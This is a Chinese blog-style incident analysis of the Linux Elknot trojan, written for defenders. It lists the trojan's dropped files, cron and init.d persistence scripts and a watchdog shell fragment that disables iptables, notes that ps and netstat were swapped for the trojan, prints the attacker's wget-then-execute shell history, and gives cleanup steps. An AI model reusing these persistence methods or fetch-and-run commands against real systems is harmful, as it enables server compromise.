linux恶意样本-我是壮丁

今天看到drops，有白帽子发了一份服务器发现问题处理的一个过程 主机被入侵分析过程报告

曾经也处理过类似的，应该是一个家族的，就发出来吧。

0x00:后门名称

Unix.Trojan.Elknot


0x01:后门行为

1.在 /mnt 目目录下放置多个后门程序,并运行行,主要程序有:conf.n、iptv、rc.loca3、rc.loca4 等
2.在 /tmp 目目录下放置多个后门程序,并运行行,主要程序有:Internet、2868等
3.在 /etc/cron.hourly/ 目录下放置后门脚本,同时添加启动任务到/etc/crontab 中,每半三分钟执行行一一次


/etc/crontab

*/3 * * * * root /etc/cron.hourly/udev.sh


cat /etc/cron.hourly/udev.sh

#!/bin/sh

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin

cp /lib/libgcc4.so /lib/libgcc4.4.so

/lib/libgcc4.4.so


4.添加多个服务,并设置开机启动,主要服务有:selinux、DbSecuritySpt等

(/etc/init.d/中会随机的生成一个启动脚本，需要人工识别)


[root@ init.d]# cat selinux
#!/bin/bash
/usr/bin/bsd-port/getty


[[email protected]]# cat DbSecuritySpt
#!/bin/bash
/root/Internet

随机的程序有时存在，有时不存在，需要人工识别


5.在 /usr/bin/bsd-port/ 放置后门程序 getty,并执行行

6.在 /usr/bin/dbus 目目录放置后门 dbus-daemon-draw,该脚本程序通过服务执行行

7.在 /usr/bin 目目录下放置 .ssh、bin2、newnode 程序并执行行

8.在 /usr/bin 目目录下放置 acpid、.zip.swp 后门程序


acpid部分shell脚本

service iptables stop 1>/dev/null 2>/dev/null


while true; do

        if [ -x $binary ];then

                sleep 1

        else

                if [ -x /usr/bin/.zip.swp ];then

                        echo y|cp /usr/bin/.zip.swp $binary 2>/dev/null

                        chmod a+x $binary

                else

                        echo y|cp /usr/share/man/man3/ast.gz $binary 2>/dev/null

                        chmod a+x $binary

                fimv ast


        fi

"acpid" 36L, 572C


9.在 /usr/share/man/man3 放置 ast.gz 后门程序

10.替换 ps、netstat、lsof、ss 四个系统命令为后门程序

    (被替换的命令存放在/usr/bin/dpkgd)


    其中所有后门程序的MD5值相同(包含被替换的命令)

[root@www ~]# md5sum Internet
76aa5297ed2d046d3e618f0228aaf0a9  Internet
[root@www ~]# md5sum /bin/ps
76aa5297ed2d046d3e618f0228aaf0a9  /bin/ps
[root@www ~]# md5sum /usr/bin/.sshd
76aa5297ed2d046d3e618f0228aaf0a9  /usr/bin/.sshd


11.后门运行后会在/tmp目录下产生以下文件

gates.lod，moni.lod等文件


0x02:种植后门的操作(history)

  968   w

  969   ifconfig

  970   ethtool eth0

  971   cd /mnt

  972  wget http://1x.x29.x32.1x0:10089/Systenm

  973   chmod +x Systenm

  974    ./Systenm &

  975   w

  976   last

  977  wget http://18x.13x.21x.20x:8050/rc.loca3

  978   chmod 0755 /mnt/rc.loca3

  979   nohup /mnt/rc.loca3 > /dev/null 2>&1 &

  980   w

  981   04:48:18 exit

  982   cd /tmp

  983   chmod +x Internet

  984   ./Internet &

  985   chmod +x 2868

  986   ./2868 &


0x03:后门清除&&后续处理

1.删除crontab里面的内容

2.还原系统替换的命令

3.Kill已经在运行的进程

4.删除启动项中的脚本(/etc/init.d/和/etc/rc*.d里面的东西)

5.清除/tmp,/mnt，/usr/bin/等目录中的文件

6.备份数据后重装系统

7.排查其他机器

样本应该存留了，等我找到放到哪里了再发出来。。。